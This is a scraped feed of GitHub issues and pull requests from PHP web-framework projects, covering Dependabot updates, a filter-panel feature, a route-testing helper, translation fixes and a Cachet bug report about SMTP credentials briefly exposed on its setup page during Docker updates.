  • @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
  • @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
  • @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
  • @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
View more
dependabot[bot]

dependabot[bot]

3rd Jul 2026 @ 13:23

enhancement pending review

Description

This Pull Request introduces the ability to place filters in multiple locations and closes #14956.

It is a rework of the original Pull Request #20139. Thanks @danharrin for taking the time to think through the API properly.

The PR introduces a new FilterPanel component. Its first argument accepts a FiltersLayout, and the second argument is an array of filters that should be displayed in that location:

$table
    ->filters([
        FilterPanel::make(FiltersLayout::AboveContent, [
            SelectFilter::make('status'),
            SelectFilter::make('category'),
        ])->columns(2),

        FilterPanel::make(FiltersLayout::Dropdown, [
            SelectFilter::make('author'),
        ]),
    ]);

FilterPanel exposes the same configuration methods that are currently available on the table via the filtersForm* / filters* methods:

  • columns()
  • width()
  • maxHeight()
  • resetActionPosition()
  • triggerAction()

filtersApplyAction() was intentionally not included, as the Apply action behaves globally regardless of which filter panel it is triggered from.

If a setting is not explicitly overridden, it falls back to the global table configuration.

Intentional design decisions

  • Apply filters button applies filters from all panels, regardless of which panel’s button is clicked.
  • Reset filters within a panel resets only the filters belonging to that panel (this behavior has been preserved from the first version).
  • The Reset filters button (the “X” button above the table) resets all filters across all panels.
  • Modal and Dropdown panels display two filter icons. I believe this is acceptable, as developers can assign different icons to each panel or simply use only one of them.
  • The badge displayed on the filter icons for Modal and Dropdown panels shows only the number of active filters within that panel.
  • Creating multiple FilterPanel instances for the same FiltersLayout automatically merges their filters.
  • pushFilters() also merges filters into the specified panel.
  • Mixing FilterPanel instances with standard filters is intentionally not supported. The following code will throw LogicException:
$table
    ->filters([
        FilterPanel::make(FiltersLayout::AboveContent, [
            SelectFilter::make('status'),
            SelectFilter::make('category'),
        ])->columns(2),

        SelectFilter::make('author'),
    ]);

Tested and verified - everything works as expected. Backward compatibility is preserved.

Functional changes

  • Code style has been fixed by running the composer cs command.
  • Changes have been tested to not break existing functionality.
  • Documentation is up-to-date.
View more
2 comments
webard

webard

11th Jul 2026 @ 15:39

dependencies javascript

Removes esbuild. It's no longer used after updating ancestor dependencies esbuild, laravel-vite-plugin and vite. These dependencies need to be updated together.

Removes esbuild

Updates laravel-vite-plugin from 2.0.1 to 3.1.0

import { defineConfig } from 'vite'; import laravel from 'laravel-vite-plugin';

export default defineConfig({ plugins: [ laravel({ input: ['resources/css/app.css', 'resources/js/app.js'], refresh: true,

  •       assets: [
    
  •           '../images/**',
    
  •           '../favicons/**',
    
  •       ],
      }),
    
    ], });

Updates vite from 7.3.2 to 8.0.16

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.
View more
1 comment
dependabot[bot]

dependabot[bot]

12th Jun 2026 @ 22:59

Is it possible to let any uncatched javascript exception or syntax error (which stops js execution in a standard browser) a php exception be thrown?

I tried to call a non existing js function in document.ready, but panther dod not complain, I was still able to click links etc.

Thanks in advance!

View more
flaushi

flaushi

23rd Jan 2025 @ 16:54

help wanted findapr

Hello,

Is it possible to close a flash message by clicking on it and not just on clicking on the cross? If so, how to achieve it?

Regards, Fred

View more
frdemoulin

frdemoulin

13th Aug 2025 @ 20:21

Hi all,

I've added panther to my project and since then, the CI is not passing anymore :

Dockerfile:47 DL3008 warning: Pin versions in apt get install. Instead of `apt-get install <package>` use `apt-get install <package>=<version>`

It happens here :

###> symfony/panther ###
# Chromium and ChromeDriver
ENV PANTHER_NO_SANDBOX=1
# Not mandatory, but recommended
ENV PANTHER_CHROME_ARGUMENTS='--disable-dev-shm-usage'
RUN apt-get update && apt-get install -y --no-install-recommends chromium chromium-driver && rm -rf /var/lib/apt/lists/*
###< symfony/panther ###

Any idea how to fix this?

Cheers,

Laurent

View more
ghost

ghost

9th Dec 2024 @ 10:08

Hello!

I've been using Cachet for awhile and love it. I found a potential security problem, though.

With the Cachet Docker container running, when updating Docker itself (not the image), for a brief few seconds, my Cachet URL status.mydomain.com redirects to the /setup page, and it reveals my mail server's SMTP username and password in full view (password visible using DevTools inspect)...

image

After about 10 seconds when the update of Docker is complete, going to the same page status.mydomain.com shows up normally.

This happened a few weeks ago but I thought maybe it was just a glitch. I just updated today and had the same thing happen.

As a workaround, I've blocked access to the /setup page in Cloudflare so that when this happens again it won't show the page.

Using Debian 10 Buster, not sure if it affects others.

Steps to reproduce: 1.) Go to the instance URL and continue to refresh over and over while performing the next steps 2.) Update Docker through apt update;apt upgrade docker-buildx-plugin docker-ce docker-ce-cli docker-compose-plugin -y; 3.) For a brief moment during the update, you should see the URL redirect to /setup and show the credentials

I'm not sure if it's all, some, or docker-ce that causes this, but those were the packages I updated.

View more
1 comment
asheroto

asheroto

2nd Jun 2023 @ 06:40

Changes In Code

I added a check to see if the statement is ending with a semicolon. If not, it'll add it so that the .sql file generated is going to work also from the cockroach sql command

View more
lucacri

lucacri

7th Feb 2024 @ 20:47

This documents the new PostgreSQL search engine for Laravel Scout, covering driver setup, migration helpers, trigram search, configuration, and performance considerations.

Implementation: https://github.com/laravel/scout/pull/998

View more
WendellAdriel

WendellAdriel

11th Jun 2026 @ 16:48

Can the error message triggered when a file or line is missing (with warn_if_missing set to true) be made more visible?

Expected:

Actual:

View more
namlier

namlier

10th Oct 2025 @ 14:21

Motivation

Currently, when you have a route like this:

Route::get('users', [UserController::class, 'all'])->name('users.all');
Route::delete('users', [UserController::class, 'delete'])->name('users.delete');

And you write a HTTP test for your functionality behind this, you can easily mess this up like this:

public function testUsersAll()
{
    // ✓ valid, but should be either GET + users.all or DELETE + users.delete
	$this->get(route('users.delete'));
}

callRoute() links calling routes in tests with retrieving routes so that they can be validated:

public function testUsersAll()
{
    // ✓ valid, but should be either GET + users.all or DELETE + users.delete
	$this->callRoute('users.delete', method: 'GET'); // × Throws
}

Future scope (intentionally left out)

  • Dedicated methods (make the method validation more useful)
    • callGetRoute(), callPostRoute(), callPutRoute(), callPatchRoute(), callDeleteRoute(), callOptionsRoute()
    • callJsonRoute(), callJsonGetRoute(), callJsonPostRoute(), callJsonPutRoute(), callJsonPatchRoute(), callJsonDeleteRoute(), callJsonOptionsRoute()
  • Parameter validation
View more
shaedrich

shaedrich

2nd Jul 2026 @ 20:34

We are trying to find a good and easy way to handle relations.

I explain, I have :

  • 1 entity Website
  • n entites Url, related to Website (1 Website can have multiple Url)

I want to get notified when I create an Url related to the Website, I want the topic Website to be updated.

For now, I manually change a property in the parent (for example a field updatedAt).

Can I use some better way ? Or did I miss something in the doc ?

View more
vince83110

vince83110

8th Sep 2021 @ 18:20

Is there a way to create a client with dark-mode on?

View more
1 comment
FabianoLothor

FabianoLothor

16th Mar 2026 @ 16:07

Description

This PR improves and completes the Polish translation (messages+intl-icu.pl.xlf):

  1. Fixed incorrect translation:

    • action.close: Changed from "Blisko" (meaning "nearby") to "Zamknij" ("Close" as a verb/action).
  2. Added missing translations:

    • menu.choose_language ("Wybierz język")
    • menu.user ("Konto")
    • menu.rss ("Kanał RSS wpisów na blogu")
    • menu.search ("Szukaj")
    • rss.title ("Blog Symfony Demo")
    • rss.description ("Najnowsze artykuły opublikowane na blogu Symfony Demo")
    • paginator.current ("(bieżąca)")

All XLIFF syntax has been linted and verified.

View more
abedo

abedo

8th Jul 2026 @ 20:42

View more
rickerd

rickerd

6th Jun 2023 @ 19:30

dependencies

Bumps ramsey/composer-install from 3 to 4.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

27th May 2026 @ 22:11

documentation
View more
ambroisehdn

ambroisehdn

18th Jul 2022 @ 10:29

Q A
License MIT
Doc issue/PR none

Solves the following situation:

<form id="foo">
    ...
</form>

<input type="hidden" id="foo__token" name="foo[_token]" data-controller="csrf-protection" form="foo" value="csrf-token">
View more
2 comments
DavidPetrasek

DavidPetrasek

15th Apr 2026 @ 09:39

This change also uses the latest official release of Cachet by default and fixes a php issue with later versions of the alpine image.

This is reported as problems #379 and is related to https://github.com/CachetHQ/Cachet/issues/4186

View more
4 comments
seanhoughton

seanhoughton

27th Jan 2021 @ 21:40